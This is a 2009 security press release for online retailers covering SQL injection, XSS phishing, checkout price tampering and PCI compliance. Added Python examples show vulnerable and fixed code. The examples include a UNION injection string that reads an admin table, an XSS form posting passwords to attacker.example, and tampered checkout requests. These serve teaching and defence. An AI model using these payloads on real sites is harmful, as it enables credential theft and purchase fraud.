Online retailers should look to secure sites and underlying systems to protect their businesses and customers’ personal data.
Dublin, Ireland, Monday 30th November 2009… Irish information security company Espion is encouraging online retailers to become more aware of the risks to themselves and their customers, and to take the necessary steps to help ensure safe Christmas shopping this year.
“Given the increase in the amount of personal and financial information that will flow over the Internet in the coming weeks, opportunistic online criminals may try their luck by attempting to exploit weaknesses in online retail sites to gain access to lucrative information,” explains Colm Murphy, technical director with Espion. “Sites may also be vulnerable to hackers able to manipulate the sales process to purchase for free.”
Espion’s IT security specialists are highlighting that security should be an integral part of web application development: “Information security must be a continuous process, as technologies that improve user experiences online are often more complex and give rise to security vulnerabilities. The impact of these weaknesses in a retail context is significant, given the financial and personal data exchanged during an online transaction.”
Vulnerabilities – Ones to Watch:
- Customer data in transit – As customers send their personal information to online retailers, there needs to be an assurance that the data is protected on the way. Encrypting customer data in transit is now standard practice: consumers increasingly look for Hypertext Transfer Protocol Secure (HTTPS) on retail sites, which encrypts the connection and, through the site’s certificate, lets the browser confirm it is talking to the genuine retailer. The protection should cover every page that handles personal data (registration, login, basket and checkout), not only the final payment step.
- Stored customer data – The majority of online retail sites have back-end databases that data is sent to and fetched from during a transaction. Hackers look for places on the site, usually form fields or search functions, where customer-supplied text is relayed into a database query. ‘SQL injection’ occurs when that text is spliced into the query and so changes its structure; a crafted input can reveal details of the back-end technologies, read tables the customer should never see (account and administrator records, for example) and, in some cases, bypass login altogether. The fix is to pass user input to the database as bound parameters rather than building query text from it. Online retailers should also ensure that the systems holding stored data are properly secured with the appropriate firewalls, anti-virus and anti-spyware technologies.
- Credit card data – Customer data, whether stored or in transit, requires significant levels of protection. When credit card information is part of this customer data, there are compliance requirements to be considered (PCI DSS, the Payment Card Industry Data Security Standard) which mandate that the appropriate information security measures are in place.
- Checkout Scams – This vulnerability is specific to online shopping carts and payment gateways. Using a web application proxy, an attacker intercepts the requests the browser sends to the shop and alters values in them, such as a hidden price field or an item quantity, before they reach the server; if the server trusts those client-supplied values, the final payable price changes. While no customer information is compromised, the online retailer is essentially robbed. Depending on the price of the item or the volume of purchases, this can be extremely damaging if it is not detected and addressed in a timely manner.
- Cross-site Scripting (XSS) / Phishing attacks – XSS occurs when a site places customer-controlled input (a search term, a product review, a parameter in a link) into its pages without encoding it, so that the attacker’s own HTML or script runs in other customers’ browsers under the retailer’s legitimate domain. Because the injected content appears on the real site, it is an effective vehicle for phishing: the attacker rewrites part of the page, or pops up a window, that looks like the retailer’s login or payment form and captures whatever the customer types.
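The two input-handling weaknesses above, SQL injection through a search field (under “Stored customer data”) and XSS in the page that displays the results, shown side by side with their fixes. This is an added Python example and not code from the original release or from Espion; the in-memory product and administrator tables, the attack strings and the function names are constructed for illustration.

```python
import html
import sqlite3


# Constructed sample catalogue and admin table; not data from any real shop.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price_cents INTEGER);
        CREATE TABLE admin_users (username TEXT, password_hash TEXT);
        INSERT INTO products VALUES (1, 'Red Scarf', 1999), (2, 'Blue Hat', 2499);
        INSERT INTO admin_users VALUES ('admin', 'hash-placeholder');
    """)
    return conn


def search_vulnerable(conn, term):
    # The search term is spliced into the query text, so a quote character in
    # it ends the string literal and the rest of the term becomes SQL.
    sql = "SELECT name FROM products WHERE name LIKE '%" + term + "%'"
    return [row[0] for row in conn.execute(sql)]


def search_hardened(conn, term):
    # The term is sent as a bound parameter: the driver treats it purely as
    # data and the structure of the query is fixed whatever the customer typed.
    sql = "SELECT name FROM products WHERE name LIKE ?"
    return [row[0] for row in conn.execute(sql, ("%" + term + "%",))]


def render_vulnerable(term, names):
    # Reflects the raw term into the page, so HTML in it (here a fake login
    # form) is rendered by the browser under the shop's own domain (XSS).
    items = "".join("<li>" + n + "</li>" for n in names)
    return "<p>Results for " + term + "</p><ul>" + items + "</ul>"


def render_hardened(term, names):
    # Encode everything that came from the user or the database before it is
    # placed into HTML text, so it is displayed rather than interpreted.
    items = "".join("<li>" + html.escape(n) + "</li>" for n in names)
    return "<p>Results for " + html.escape(term) + "</p><ul>" + items + "</ul>"


# Constructed attack inputs, as they might be typed into the search box.
SQLI_TERM = "' UNION SELECT username || ':' || password_hash FROM admin_users --"
XSS_TERM = ('<form action="https://attacker.example/collect">'
            'Session expired, please sign in: <input name="password"></form>')

if __name__ == "__main__":
    conn = make_db()
    print(search_vulnerable(conn, SQLI_TERM))   # includes 'admin:hash-placeholder'
    print(search_hardened(conn, SQLI_TERM))     # []: no product name contains the payload
    print(render_vulnerable(XSS_TERM, []))      # raw <form> reaches the browser
    print(render_hardened(XSS_TERM, []))        # &lt;form ...&gt; is shown as text
```

The injected term turns the product search into a UNION with the administrator table, which is exactly the "restricted area" the text warns about; with the bound parameter the same term simply matches nothing. The rendering fix encodes database values as well as the search term, because a product name or review stored earlier by an attacker is just as untrusted as the current request.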
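The checkout scam above comes down to the server trusting a price that travelled through the customer's browser. The following added Python example (not code from the original release or from Espion; the catalogue, form layout, quantity limit and function names are assumptions made for illustration) shows a checkout total computed from the posted form beside one re-priced from the server-side catalogue, plus the mismatch check a retailer can log to notice tampering early.

```python
# Constructed catalogue: the only source of prices the server should trust.
CATALOGUE = {"SKU-RED-SCARF": 1999, "SKU-BLUE-HAT": 2499}   # prices in cents
MAX_QTY = 100   # assumed per-line limit for a consumer shop


def checkout_vulnerable(form):
    # Sums whatever price and quantity the browser posted. The hidden price
    # field was written by the shop's own page, but a web application proxy
    # can rewrite it in the request, so this is trusting the attacker.
    return sum(int(line["price_cents"]) * int(line["qty"]) for line in form["lines"])


def checkout_hardened(form):
    # Re-prices every line from the catalogue and validates quantities. Any
    # price_cents field in the form is ignored entirely.
    total = 0
    for line in form["lines"]:
        sku = line["sku"]
        if sku not in CATALOGUE:
            raise ValueError("unknown sku: " + sku)
        qty = int(line["qty"])
        if not 1 <= qty <= MAX_QTY:
            raise ValueError("invalid quantity for " + sku)
        total += CATALOGUE[sku] * qty
    return total


def tampered_lines(form):
    # Detection: lines where the client-sent price disagrees with the
    # catalogue. Worth logging and alerting on even once the server no longer
    # trusts the field, since it shows someone is probing the checkout.
    return [line["sku"] for line in form["lines"]
            if line.get("price_cents") is not None
            and int(line["price_cents"]) != CATALOGUE.get(line["sku"])]


# Constructed POST bodies as the server sees them after form decoding.
HONEST_FORM = {"lines": [
    {"sku": "SKU-RED-SCARF", "qty": "1", "price_cents": "1999"},
    {"sku": "SKU-BLUE-HAT", "qty": "1", "price_cents": "2499"},
]}
TAMPERED_FORM = {"lines": [
    {"sku": "SKU-RED-SCARF", "qty": "1", "price_cents": "1"},      # rewritten in the proxy
    {"sku": "SKU-BLUE-HAT", "qty": "1", "price_cents": "2499"},
]}
NEGATIVE_QTY_FORM = {"lines": [
    {"sku": "SKU-RED-SCARF", "qty": "1", "price_cents": "1999"},
    {"sku": "SKU-BLUE-HAT", "qty": "-1", "price_cents": "2499"},   # negative line offsets the total
]}

if __name__ == "__main__":
    print(checkout_vulnerable(TAMPERED_FORM))   # 2500: scarf sold for one cent
    print(checkout_hardened(TAMPERED_FORM))     # 4498: catalogue price used
    print(tampered_lines(TAMPERED_FORM))        # ['SKU-RED-SCARF']
    print(checkout_vulnerable(NEGATIVE_QTY_FORM))  # -500: a refund the shop never intended
```

The same principle applies to anything else the page round-trips through the client (discount amounts, shipping cost, currency): accept an identifier, look the value up server-side, and treat a disagreement between the two as an incident rather than a rounding error.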
TIPS for online retailers:
- Make security part of your development – do not wait for an attack or breach. Understand where the weaknesses are and address them, and regularly test your site to ensure it is robust enough to resist attack. The Open Web Application Security Project (OWASP) is an organisation that provides practical, freely available guidance on web application security. Its Top 10 project explains the ten most critical web application security vulnerabilities and how to protect against them.
- If you are using open source applications, stay on top of any patches that are released. Often, after one site is successfully breached, hackers scan for other sites running the same unpatched software and repeat the process.
- Ensure that any administrative sections of the site are secured against unauthorised access. Many sites are maintained by logging in to the site itself, and this administrator login gives access to all areas of the site, possibly including details of the back-end systems and the location of sensitive data, which could be damaging if breached.
- If online retailers are taking and storing credit card information they are obliged to become PCI compliant. For many companies, this may be a valuable exercise and a prudent investment. For smaller sites with limited resources, using a trusted third-party payment service such as PayPal or Google Checkout can largely avoid this expense by taking credit card information out of the retailer’s own transaction processes (the compliance scope shrinks considerably, although it does not disappear entirely) and offering customers an increased level of confidence in your site.
Espion is an advisory practice specialising in information security. We work with companies to ensure that the critical information essential to their success is secure. Espion’s comprehensive approach is unique and highly effective and includes services to address information assurance, governance, risk and compliance, IT audit, forensic investigation and IT security training. Utilising a collaborative approach, our team of highly experienced consultants look to fully understand the client’s business first and from there determine the risks and exposures that they may have, and help the client understand, manage and mitigate those threats to information security.
Espion Forensics is operated by Espion Limited. Since 2001, Espion has assisted hundreds of Irish organisations to successfully resolve a wide range of computer-related forensic investigations. Our certified consultants and proven methodologies combine to provide a world-class forensic investigation service. We have worked with the leading government, financial and private organisations in Ireland and further afield. We have provided expert testimony in the Irish courts as well as employment tribunals and other forums. We can quickly and professionally assist in a variety of scenarios, and have the expertise and experience to ensure all incidents are handled in the manner expected by international standards.
Espion Ltd., The Old Church, Belmont, Galloping Green, Stillorgan, Co. Dublin
Ph: +353-1-2101711 www.espion.ie
For more information, please contact:
Colman Morrissey/Colm Murphy
01 210 1711
Practice PR & Events
053 94 296 76